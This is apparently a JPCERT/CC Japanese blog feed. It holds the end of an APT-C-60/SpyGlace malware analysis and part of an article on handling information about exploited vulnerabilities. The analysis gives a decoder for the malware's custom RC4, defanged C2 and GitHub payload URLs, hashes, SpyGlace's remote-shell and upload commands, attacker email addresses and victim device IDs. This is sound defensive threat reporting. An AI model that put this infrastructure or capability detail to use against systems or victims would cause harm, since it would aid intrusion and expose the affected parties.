改変されたRC4はKSAのサイクルを増やす点やXORする値に加算を行うなどの点が通常のRC4とは異なり、次に示すPythonスクリプトでデコードすることが可能です。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> import base64 def CustomRC4(key: bytes, data: bytes) -> bytes: # --- KSA --- S = list(range(256)) n = 3 for round in range(n): j = 0 keylen = len(key) if keylen == 0: raise ValueError("key must be non-empty") for i in range(256): j = (j + S[i] + key[i % keylen]) & 0xFF S[i], S[j] = S[j], S[i] # --- PRGA --- i = j = 0 out = [] for b in data: i = (i + 1) & 0xFF j = (j + S[i]) & 0xFF k = S[(S[i] + j) & 0xFF] S[i], S[j] = S[j], S[i] k2 = S[((S[((i >> 3) ^ (0x20 * j)) & 0xFF] + S[((0x20 * i) ^ (j >> 3)) & 0xFF]) ^ 0xAA) & 0xFF] + S[(S[j] + S[i]) & 0xFF] out.append( (b ^ k ^ k2) & 0xFF ) return bytes(out) def decode(base64in): key = b"90b149c69b149c4b99c04d1dc9b940b9" decoded = CustomRC4(key, base64.b64decode(base64in)) print("Result: ", decoded) </pre> <h3>使用されたデコイ文章</h3> 今回の攻撃で使用されたデコイ文章の一部を図3に示します。採用担当者をターゲットとしているため、作成された履歴書には研究者を装った経歴を載せており、経歴に複数の論文が記載されていますが、それら論文の著者にはメール送付者の名前は記載されていません。なお、その履歴書の本人の名前はメールの差出人のGmailのアカウント名とある程度一致しており、攻撃者は本攻撃のためにアカウントを取得した可能性があります。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update03-800wri.png" width="800" height="1034" alt="" class="asset asset-image at-xid-3905242 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図3：使用されたデコイ文章の一部 </div> <h3>GitHubリポジトリの分析</h3> 攻撃者はペイロードの配布にGitHubを使用している関係で、リポジトリが削除されない限り、過去に配布されたペイロードをすべて取得することが可能です。表2にアップロードしたSpyGlaceとアップロードされていた期間の対応関係を示します。 <div style="text-align: center;"> 表2 各バージョンにおけるGitHubにアップロードされた日時 </div> <table> <thead> <tr> <th>SpyGlace Version</th> <th>Upload Date & Time</th> </tr> </thead> <tbody> <tr> <td>Version 3.1.12</td> <td>Fri Jun 27 14:33:28 2025 +0900</td> </tr> <tr> <td>Version 3.1.13</td> <td>Thu Jul 3 18:25:18 2025 +0900</td> </tr> <tr> <td>Version 3.1.14</td> <td>Wed Jul 16 15:03:52 2025 +0900</td> </tr> </tbody> </table> <table> なお、攻撃者が管理しているGitHubリポジトリへのコミットログに記載されたメールアドレスおよびボリュームシリアル番号とコンピュータ名からなる被害端末情報を確認しています。それらの情報を参考としてAppendix E、Fにそれぞれ記載します。 <h2>おわりに</h2> APT-C-60による攻撃はこれまでの傾向と同様に日本などの東アジア地域を中心に攻撃が行われています。攻撃の内容はBitbucketからGitHubへとインフラを移行した点やマルウェアのアップデートなど変更点は確認できるものの、正規のサービスを使った点やマルウェアの挙動など変わらない部分も多いため、これまでの傾向を踏まえ引き続き注意が必要です。確認したマルウェアの通信先やハッシュ値については、Appendixに記載していますのでそれぞれご確認ください。なお、通信先については正規のサービスも含まれるため、ご注意ください。 インシデントレスポンスグループ増渕維摩 <h4>参考情報</h4> <a name="1"></a>[1] Sangfor 【高级威胁追踪(APT)】深入分析“伪猎者”组织Github仓库加密载荷 <a href="https://mp.weixin.qq.com/s/A1UhFfqnGRLsEZywvaQA4A" target="_blank"> https://mp.weixin.qq.com/s/A1UhFfqnGRLsEZywvaQA4A</a> <a name="2"></a>[2] Positive Technologies DarkHotel. A cluster of groups united by common techniques <a href="https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques/" target="_blank"> https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques/</a> <h4>Appendix A：IoC Network</h4> <ul> <li>https[:]//c.statcounter[.]com/13139439/0/1ba1a548/1/</li> <li>https[:]//raw.githubusercontent[.]com/carolab989/class2025//refs/heads/main/</li> <li>https[:]//raw.githubusercontent[.]com/football2025/class2025//refs/heads/main/</li> <li>https[:]//raw.githubusercontent[.]com/fenchiuwu/class2025/refs/heads/main/</li> <li>http[:]//raw.githubusercontent[.]com/Ridgley22387/r834829jf/refs/heads/main/datapages.txt</li> <li>http[:]//raw.githubusercontent[.]com/Ridgley22387/r834829jf/refs/heads/main/datautils.txt</li> <li>https[:]//bitbucket[.]org/clouds999/glo29839/downloads/</li> <li>https[:]//raw.githubusercontent[.]com/goldbars33/ozbdkak33/refs/heads/main/</li> <li>https[:]//185.181.230[.]71/wkdo9/4b3ru.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/t1802.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/n3tb4.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/2qpmk.asp</li> </ul> <h4>Appendix B：IoC File</h4> <div style="text-align: center;"> 表3 ファイル一覧 </div> <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 20%;"> <col style="width: 20%;"> <col style="width: 60%;"> </colgroup> <thead> <tr> <th>Content</th> <th>Filename</th> <th>Hash(SHA256)</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious VHDX</td> <td style="word-wrap: break-word; white-space: normal;">CV & Professional Experience.vhdx</td> <td style="word-wrap: break-word; white-space: normal;">f42d0fa77e5101f0f793e055cb963b45b36536b1835b9ea8864b4283b21bb68f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious LNK</td> <td style="word-wrap: break-word; white-space: normal;">Resume.rtf.lnk</td> <td style="word-wrap: break-word; white-space: normal;">25f81709d914a0981716e1afba6b8b5b3163602037d466a02bc1ec97cdc2063b</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic60.ds</td> <td style="word-wrap: break-word; white-space: normal;">ea37dfa94a63689c1195566aab3d626794adaab4d040d473d4dfbd36f1e5f237</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic400.ds</td> <td style="word-wrap: break-word; white-space: normal;">a80848cf7d42e444b7ec1161c479b1d51167893f47d202b05f590ad24bf47942</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic900.ds</td> <td style="word-wrap: break-word; white-space: normal;">1e931c8aa00b7f2b3adedc5260a3b69d1ac914fe1c022db072ed45d7b2dddf6c</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Dropper Script</td> <td style="word-wrap: break-word; white-space: normal;">glog.txt</td> <td style="word-wrap: break-word; white-space: normal;">c9c6960a5e6f44afda4cc01ff192d84d59c4b31f304d2aeba0ef01ae04ca7df3</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">WebClassUser.dat</td> <td style="word-wrap: break-word; white-space: normal;">f102d490ad02b1588b9b76664cd715c315eaab33ac22b5d0812c092676242b15</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">DownLoader2</td> <td style="word-wrap: break-word; white-space: normal;">WebCacheR.tmp.dat</td> <td style="word-wrap: break-word; white-space: normal;">57a77d8d21ef6a3458763293dbe3130dae2615a5de75cbbdf17bc61785ee79da</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">DownLoader2</td> <td style="word-wrap: break-word; white-space: normal;">WebCacheR.tmp.dat</td> <td style="word-wrap: break-word; white-space: normal;">9e30df1844300032931e569b256f1a8a906a46c6a7efa960d95142d6bea05941</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">git.exe(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">gcmd.exe</td> <td style="word-wrap: break-word; white-space: normal;">96312254d33241ce276afc7d7e0c7da648ffe33f3b91b6e4a1810f0086df3dba</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.12</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">669c268e4e1ced22113e5561a7d414a76fcd247189ed87a8f89fbbd61520966a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.13</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">f96557e8d714aa9bac8c3f112294bac28ebc81ea52775c4b8604352bbb8986b8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.14</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">8b51939700c65f3cb7ccdc5ef63dba6ca5953ab5d3c255ce3ceb657e7f5bfae8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace Loader</td> <td style="word-wrap: break-word; white-space: normal;">datapages.txt</td> <td style="word-wrap: break-word; white-space: normal;">d535837fe4e5302f73b781173346fc9031d60019ea65a0e1e92e20e399a2f387</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace Loader</td> <td style="word-wrap: break-word; white-space: normal;">datapages.txt</td> <td style="word-wrap: break-word; white-space: normal;">6d8a935f11665850c45f53dc1a3fc0b4ac9629211bd4281a4ec4343f8fa02004</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader2</td> <td style="word-wrap: break-word; white-space: normal;">coninst3110.dat</td> <td style="word-wrap: break-word; white-space: normal;">d287dc5264fd504b016ec7e424650e2b353946cbf14d3b285ca37d78a6fda6f4</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">constart3110.dat</td> <td style="word-wrap: break-word; white-space: normal;">10278a46b13797269fd79a5f8f0bc14ff1cc5bc0ea87cdd1bbc8670c464a3cf1</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">ingredient.txt</td> <td style="word-wrap: break-word; white-space: normal;">156df8c8bea005bd7dc49eb7aca230ef85ada1c092e45bb3d69913d78c4fa1f9</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader Scrpt</td> <td style="word-wrap: break-word; white-space: normal;">UsrClass.sct</td> <td style="word-wrap: break-word; white-space: normal;">7ae86f2cb0bbe344b3102d22ecfcdda889608e103e69ec92932b437674ad5d2f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader Scrpt</td> <td style="word-wrap: break-word; white-space: normal;">UsrClass.sct</td> <td style="word-wrap: break-word; white-space: normal;">e8b3b14a998ce3640a985b4559c90c31a5d7465bc5be5c6962e487172d3c9094</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">intersection.txt</td> <td style="word-wrap: break-word; white-space: normal;">09fcc1dfe973a4dc91582d7a23265c0fd8fc2a011adb2528887c1e1d3a89075a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader</td> <td style="word-wrap: break-word; white-space: normal;">opinsfile.dat</td> <td style="word-wrap: break-word; white-space: normal;">048b69386410b8b7ddb7835721de0cba5945ee026a9134d425e0ba0662d9aee4</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">constafile.dat</td> <td style="word-wrap: break-word; white-space: normal;">f495171e7a10fb0b45d28a5260782a8c1f7080bd1173af405476e8d3b11b21b6</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader</td> <td style="word-wrap: break-word; white-space: normal;">coninsfile.dat</td> <td style="word-wrap: break-word; white-space: normal;">8ea32792c1624a928e60334b715d11262ed2975fe921c5de7f4fac89f8bb2de5</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious VHDX</td> <td style="word-wrap: break-word; white-space: normal;">CV & Professional Experience.vhdx</td> <td style="word-wrap: break-word; white-space: normal;">94ccdaf238a42fcc3af9ed1cae1358c05c04a8fa77011331d75825c8ac16ffd8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Dropper Script</td> <td style="word-wrap: break-word; white-space: normal;">volumelog.txt</td> <td style="word-wrap: break-word; white-space: normal;">299d792c8d0d38d13af68a2467186b2f47a1834c6f2041666adafc626149edaf</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol60.dot</td> <td style="word-wrap: break-word; white-space: normal;">ea37dfa94a63689c1195566aab3d626794adaab4d040d473d4dfbd36f1e5f237</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol400.dot</td> <td style="word-wrap: break-word; white-space: normal;">94f6406a0f40fb8d84ceafaf831f20482700ee1a92f6bca1f769dff98896245c</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol900.dot</td> <td style="word-wrap: break-word; white-space: normal;">45c1c79064cef01b85f0a62dac368e870e8ac3023bfbb772ec6d226993dc0f87</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">UsrClassCache.dat</td> <td style="word-wrap: break-word; white-space: normal;">50b40556aa7461566661d6a8b9486e5829680951b5df5b7584e0ab58f8a7e92f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious LNK</td> <td style="word-wrap: break-word; white-space: normal;">Resume.rtf.lnk</td> <td style="word-wrap: break-word; white-space: normal;">5da82fa87b0073de56f2b20169fa4d6ea610ed9c079def6990f4878d020c9d95</td> </tr> </tbody> </table> <h4>Appendix C：IoC Other</h4> <div style="text-align: center;"> 表4 その他のIoC </div> <table> <thead> <tr> <th>Content</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Mutex</td> <td>K31610KIO9834PG79A90B</td> </tr> <tr> <td>Mutex</td> <td>K31610KIO9834PG79AD7B</td> </tr> <tr> <td>Mutex</td> <td>K31610KIO9834PG79A44A</td> </tr> <tr> <td>CLASSID</td> <td>{566296fe-e0e8-475f-ba9c-a31ad31620b1}</td> </tr> <tr> <td>CLASSID</td> <td>{64B8F404-A4AE-11D1-B7B6-00C04FB926AF}</td> </tr> <tr> <td>File path</td> <td>%userprofile%\AppData\Local\Microsoft\Windows\WebClassUser.dat</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\WebCache\WebCacheR.tmp.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\GameDVR\data\GameList.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\GameDVR\data\DataCache.dat</td> </tr> <tr> <td>File path</td> <td>%temp%\wcts66889.tmp</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\UsrClassCache.dat</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\UsrClassLib.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\Edge\cache\Config.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\Local\Microsoft\Windows\UsrClassCache.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\Edge\cache\Cache.dat</td> </tr> </tbody> </table> <h4>Appendix D：Commands</h4> <div style="text-align: center;"> 表5 SpyGlaceのコマンド一覧 </div> <table> <thead> <tr> <th>Command</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>turn on</td> <td>Change the interval settings</td> </tr> <tr> <td>turn off</td> <td>Reset the interval settings</td> </tr> <tr> <td>cd</td> <td>Change directory</td> </tr> <tr> <td>ddir</td> <td>List of the files in the directory</td> </tr> <tr> <td>ddel</td> <td>Delete file and directory</td> </tr> <tr> <td>ld</td> <td>Load module</td> </tr> <tr> <td>uld</td> <td>unload module</td> </tr> <tr> <td>attach</td> <td>Start module</td> </tr> <tr> <td>detach</td> <td>Stop module</td> </tr> <tr> <td>procspawn</td> <td>Start process</td> </tr> <tr> <td>prockill</td> <td>None</td> </tr> <tr> <td>proclist</td> <td>None</td> </tr> <tr> <td>diskinfo</td> <td>Get disk information</td> </tr> <tr> <td>download</td> <td>Download encrypted file</td> </tr> <tr> <td>downfree</td> <td>Download file</td> </tr> <tr> <td>cancel</td> <td>Remote shell</td> </tr> <tr> <td>screenupload</td> <td>Upload screenshot</td> </tr> <tr> <td>screenauto</td> <td>Upload screenshot automatically</td> </tr> <tr> <td>upload</td> <td>Upload file</td> </tr> </tbody> </table> <h4>Appendix E：Email address used for the commit</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> kithatart@outlook.com magnolia099@163.com carolab989@proton.me fenchiuwu@proton.me Ridgley223870@proton.me </pre> <h4>Appendix F：Victimized devices identified from the GitHub repository</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 1014988494f04da28046ba 1020301627MBE4OSU 2096821130DESKTOP-BN9A2SA 2958455713DESKTOP-NKVAKV1 4205732935******（個人名が含まれている可能性があるためマスクしています） 3761538073DESKTOP-PVKDUAM 3537034124JKS 3472318429******（個人名が含まれている可能性があるためマスクしています） 1620260207DESKTOP-6LO36DE 1347261043DESKTOP-0V7K7HA 2352730816DESKTOP-4QC5J5Q 3362573326DESKTOP-43R2GH0 </pre>
解説：脆弱性関連情報取扱制度の運用と今後の課題について（後編）～脆弱性悪用情報のハンドリングと今後の課題～

Fri, 19 Sep 2025 02:30:00 -0000

はじめに本稿の前編では、「情報セキュリティ早期警戒パートナーシップ」[1]制度...

<h4>はじめに</h4> 本稿の前編では、「情報セキュリティ早期警戒パートナーシップ」<a href="#fn1">[1]</a>制度に基づく、いわゆる「協調された脆弱性開示（CVD）」について解説し、平時における取り組みをご紹介しました。後編では、脆弱性がすでに悪用されている、あるいは悪用の蓋然性が高まっている状況における対処オペレーションについてご紹介したいと思います。脆弱性悪用の情報、特に公表前のゼロデイ攻撃に関する情報は、多くの組織がその取り扱い経験のあるものではありません。JPCERT/CCでは年間を通じて多くの脆弱性調整・公表を行うほか、悪用情報に関するハンドリング（脆弱性調整と並行した脅威情報の流通、注意喚起、情報共有活動への展開、海外組織との連携等）を行っています。このあまり知られていないオペレーションの解説を踏まえた上で、今後の制度改善のための論点についても簡単に考察してみたいと思います。 ＜本稿をお読みいただく際の注意点＞ ・本稿で解説する際の「脆弱性が見つかった製品」は特段の指定がない限り、基本的に法人向け製品を想定し、解説しています。コンシューマー向け製品における同様の解説については紙幅の都合から省略していますので、ご了承ください。 ・脆弱性悪用情報の取り扱い全般の留意点等については、「サイバー攻撃被害に係る情報の共有・公表ガイダンス」「攻撃技術情報の取扱い・活用手引き」をそれぞれご覧ください。 ・本稿では国内制度外のケースも扱うため、脆弱性告示上の「製品開発者」ではなく一般的に用いられるメーカー／ベンダーという呼称を使います。 <h4> </h4> <h4>脆弱性悪用情報ハンドリング時の判断要素</h4> <hr> 未知の脆弱性を悪用する攻撃キャンペーンが発覚した場合、悪用情報のハンドリング（調整、情報共有、公表等）における各判断要素は以下の図のとおりです。 情報量／正確さ： 被害現場においてただちに「未知の脆弱性が悪用された」と確定できるケースはほとんどなく、被害現場側の調査とメーカー側での検証（期間）を経て確定されます。 脆弱性調整・公表前にメーカーが得ることができた被害現場からの情報が限られていた場合、脆弱性公表や注意喚起後に発覚した被害現場の調査結果から、脆弱性に関する新たな情報が見つかり、場合によっては別の脆弱性の追加公表や追加修正が発生することがあります。 被害現場側調査／メーカー側検証： 悪用された脆弱性の正確な特定のためには、被害現場側での調査だけではなく、メーカー側での検証が必要になります。この点については後述します。 対策の準備／顧客への連絡： メーカー側では脆弱性の特定、検証、対策方法の準備、顧客への連絡、公表等の準備を進めることになります。 攻撃が現在進行形で進んでおり、また甚大な被害が拡大している場合、状況次第では修正プログラムの提供を待たずに情報を開示（公表や顧客への連絡）し、暫定的な回避策や侵害された際の被害低減策、Hotfixの提供を行う場合があります。 公表／注意喚起／情報共有： 一般的な注意喚起発行の判断要素等の解説については、以前公開した以下の記事をご参照ください。 JPCERT/CC Eyes：注意喚起や情報共有活動における受信者側の「コスト」の問題についてー情報発信がアリバイや成果目的の自己目的化した行為にならないためにー https://blogs.jpcert.or.jp/ja/2023/05/cost-and-effectiveness-of-alerts.html 脆弱性を悪用した攻撃で使われたマルウェアや通信先等、侵害を見つけるためのインディケータ情報は、注意喚起時に公表されるケースもあれば、非公開の情報共有活動で展開されるケースもあり、伝達手段や組み合わせ、タイミングはさまざまです。後述の海外製品のケースのように利用者数が多すぎるために注意喚起とともにインディケータ情報も公開されるケースもあれば、メーカーや専門機関からユーザーに対して個別に非公開で連絡を取って伝達されるケースなどもあります。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E6%83%85%E5%A0%B1%E3%83%8F%E3%83%B3%E3%83%89%E3%83%AA%E3%83%B3%E3%82%B0%E3%81%AE%E5%90%84%E5%88%A4%E6%96%AD%E8%A6%81%E7%B4%A0%E3%81%A8%E5%90%84%E7%B5%84%E7%B9%94%E3%81%AE%E3%82%A2%E3%82%AF.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881478 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E6%83%85%E5%A0%B1%E3%83%8F%E3%83%B3%E3%83%89%E3%83%AA%E3%83%B3%E3%82%B0%E3%81%AE%E5%90%84%E5%88%A4%E6%96%AD%E8%A6%81%E7%B4%A0%E3%81%A8%E5%90%84%E7%B5%84%E7%B9%94%E3%81%AE%E3%82%A2%E3%82%AF-640wri.png" alt="" width="640" height="351"></a> <figcaption>図1：脆弱性悪用情報ハンドリングの各判断要素／各組織のアクション</figcaption> </figure> <h4> </h4> <h4>脆弱性悪用のさまざまなパターンの解説</h4> <hr> 脆弱性の悪用事案について、ごく簡単に整理すると以下のようにパターン分けができます。例えば、国内製品のゼロデイでグローバルに影響するようなケースはほとんど発生していませんので、本稿では解説は省略し、JPCERT/CCがよく対応している、以下、ケースA（国内製品のゼロデイ事案）、B（海外製品のゼロデイ事案）、C（海外製品のNデイ事案）について解説します。 <table style="border-collapse: collapse; width: 100%; height: 179.2px;" border="1"><colgroup><col style="width: 25.022%;"><col style="width: 21.6857%;"><col style="width: 28.3582%;"><col style="width: 24.9342%;"></colgroup> <tbody> <tr> <td>国内製品か海外製品か</td> <td>ゼロデイ攻撃かNデイ攻撃か</td> <td>影響範囲は国内か、主に国外か、（国内含む）グローバルか</td> <td> </td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="4">国内製品</td> <td style="height: 22.4px;" rowspan="2">ゼロデイ</td> <td style="height: 22.4px;">影響は基本的に国内</td> <td style="height: 22.4px;">ケースAで解説</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">グローバルに影響</td> <td style="height: 22.4px;">（※ほとんどケースがない）</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="2">Nデイ</td> <td style="height: 22.4px;">影響は基本的に国内</td> <td>紙幅の都合から本稿では解説せず</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">グローバルに影響</td> <td>（※ほとんどケースがない）</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="4">海外製品</td> <td style="height: 22.4px;" rowspan="2">ゼロデイ</td> <td style="height: 22.4px;">国内の影響はほとんどない</td> <td style="height: 22.4px;">－ （※注意喚起等の情報発信は行っていない）</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">グローバルに影響</td> <td style="height: 22.4px;">ケースBで解説</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="2">Nデイ</td> <td style="height: 22.4px;">国内の影響はほとんどない</td> <td style="height: 22.4px;">－ （※注意喚起等の情報発信は行っていない）</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">グローバルに影響</td> <td style="height: 22.4px;">ケースCで解説</td> </tr> </tbody> </table> <h5>＜ケースA：国内製品のゼロデイ事案＞</h5> 国内製品の場合、発見者や被害組織、または製品開発者からの連絡・相談を受けて、脆弱性の特定と製品開発者での修正プログラム準備、公表に向けた調整が行われます。本稿前編で解説のとおり、国内においては「情報セキュリティ早期警戒パートナーシップ」に基づき、調整機関として指定されたJPCERT/CCが製品開発者との調整を行います。国内で悪用被害がすでに発生している場合はインシデント対応支援や情報共有活動とセットで調整が行われ、被害現場からの情報をもとに原因（悪用された脆弱性）の特定が行われます。被害組織、調査を行う組織、JPCERT/CC、製品開発者と複数の関係者が連携して脆弱性公表や悪用に関する注意喚起に向けた調整が行われます。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E5%9B%BD%E5%86%85%E8%A3%BD%E5%93%81%E6%82%AA%E7%94%A8%E6%99%82%E3%81%AE%E5%AF%BE%E5%BF%9C.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881658 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E5%9B%BD%E5%86%85%E8%A3%BD%E5%93%81%E6%82%AA%E7%94%A8%E6%99%82%E3%81%AE%E5%AF%BE%E5%BF%9C-640wri.png" alt="" width="640" height="431"></a> <figcaption>図2：国内製品悪用時の対応</figcaption> </figure> 〇被害現場側調査とメーカー側調査との間の仲介・調整・検証 本稿前編にて、脆弱性発見者と製品開発者との間の知見の非対称性によるミスコミュニケーションの問題について触れましたが、悪用事案対応においても同様の問題はあります。例えば、悪用被害現場側が調査結果から指摘する脆弱性の存在の可能性とその修正方法について、製品開発者側が攻撃に関する知見や情報が不足しているため正確に理解できず、修正プログラムが不十分なものとなってしまうケースがあります。また、被害現場側は調査に係るNDAや行政機関側への報告等、情報の取り扱いに制限がかけられていることが多いため、製品開発者側に十分な情報が提供されず、脆弱性の特定・検証や修正が不十分に終わる恐れがあります。 逆に、悪用被害現場側の調査者が当該製品について知見や情報が不足しており、脆弱性やその発生箇所について誤認（あるいは不足）してしまっているケースもあります。そうした際には調整機関であり、かつ、インシデント対応組織であるJPCERT/CCが仲介を行い、適切な脆弱性修正への調整を行っています。 また、当該時点までに認知・調査できている被害現場が限定的であったり、攻撃者が痕跡を消去、または痕跡が極めて残りにくい脆弱性／攻撃であったりする場合、当該脆弱性情報以外のインディケータ情報を情報共有活動に展開・照会を行い、同一アクターによる他の被害現場を見つけ出し、不足するアーティファクト／情報を補う必要がある場合もあります。 さらには、同一アクターが複数の脆弱性（※同一製品の複数の脆弱性を組み合わせている場合や、複数の製品の脆弱性を同一攻撃キャンペーン内で悪用している可能性も否定できない）を悪用していないか確認する必要もあり、攻撃キャンペーンへの対処という観点では、被害現場―メーカー間の調査結果を相互に連携させる必要があるのです。 調整機関としてのJPCERT/CCの役割は、単に「連絡役」ではなく、こうした情報の出し入れや検証がスムーズに行えるよう「調整役」「検証役」でもあるのです。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E9%96%A2%E4%BF%82%E8%80%85%E9%96%93%E3%81%A7%E8%A1%8C%E3%82%8F%E3%82%8C%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%A4%9C%E8%A8%BC%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E5%90%84%E5%88%A4-81694d.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881660 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E9%96%A2%E4%BF%82%E8%80%85%E9%96%93%E3%81%A7%E8%A1%8C%E3%82%8F%E3%82%8C%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%A4%9C%E8%A8%BC%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E5%90%84%E5%88%A4-81694d-640wri.png" alt="" width="640" height="360"></a> <figcaption>図3：発見者―調整機関―製品開発者間で行われる脆弱性悪用に関する検証（のための各判断要素）</figcaption> </figure> 〇他のゼロデイ攻撃被害組織の発見と支援 脆弱性調整と別にインシデント対応支援／情報共有活動としてインディケータ情報の展開などを行い、まだ被害を認知できていない被害組織の特定を行います。攻撃キャンペーンがなおも継続中で緊急を要する場合、修正プログラム等の準備ができ次第、速やかに脆弱性公表や注意喚起を行い、その際にIoC情報や侵害調査方法を開示し、このフェーズの代わりとすることもあります。 また、法人向け製品の場合、製品開発者側から利用顧客にコンタクト／サポートできるケースがあるため、脆弱性公表前に影響のある顧客等への事前連絡を行う場合が多くあります。主に海外製品の先行例が多いですが、製品のテレメトリー通信やリモートサポート等によって製品開発者側から侵害疑義のある顧客を特定・通知できる場合もあり、脆弱性公表や注意喚起前に事前に実施するケースもあります。 